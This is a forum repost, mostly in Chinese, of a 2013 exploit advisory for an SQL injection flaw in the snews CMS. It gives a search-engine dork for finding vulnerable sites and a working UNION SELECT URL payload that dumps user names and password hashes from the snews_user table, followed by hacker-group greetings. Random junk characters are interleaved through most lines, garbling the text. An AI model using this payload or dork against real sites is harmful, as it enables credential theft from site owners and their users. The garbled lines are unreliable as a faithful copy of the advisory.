标题: CMS snews SQL Injection Vulnerability
) P% K _' Y0 I# H! p" F* w作者: By onestree
3 A8 [1 O9 W% j1 @9 B& e2 j下载地址 : http://snewscms.com/
6 p! u) v6 C) A$ e/ f# b+ R, X测试平台 : ubuntu 12.10 / win 7
" {0 B4 i: R, d3 s& [/ W' X! ~4 I关键词: inurl:"tanyakan pada rumput yang bergoyang"
0 g" g; ]# ]% y3 A) l; }* r" O
5 q* d% D p3 U h* s6 U# ~( j' N ( D7 B, `' Q* O E+ A4 S- P$ _7 B
*************************************************************: a4 Z% v* d* X+ }% G6 X
, f" R8 b/ G6 Q6 ~5 l& P+ N7 Y- {SQL poc:: a1 f: j$ `: E4 L% q. j
* |! H4 \& v3 v {) H8 X T. k7 ^
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]( v( h/ h& F( ]$ i# y
0 t: x! H: B9 }2 n$ N8 b5 T0 H: }- B
示例2 b! _% B+ ^* _/ p( v
; d8 }, C9 n2 T2 `/ D \
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
: \9 Z( u2 n9 \8 L# V3 f 4 a3 K% r, k( n* N
) h4 f6 n- o4 r8 R: a7 Y8 i
致谢:
6 U8 R' k2 c0 y5 G" R - j* h; l% X [ ^; u+ K
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell6 U$ T- T+ \( Q5 U9 J
' h, {( p0 `2 l& S! L
indonesiancoder - moeslimh4x0r - go-coder P. z2 h5 a* v3 G( W0 c
% \- Q; \8 h0 ^# C3 `
spesial my hunny :*' r* F$ f$ N/ C' |
|
发表于 2013-1-23 08:55:06
收藏
支持
反对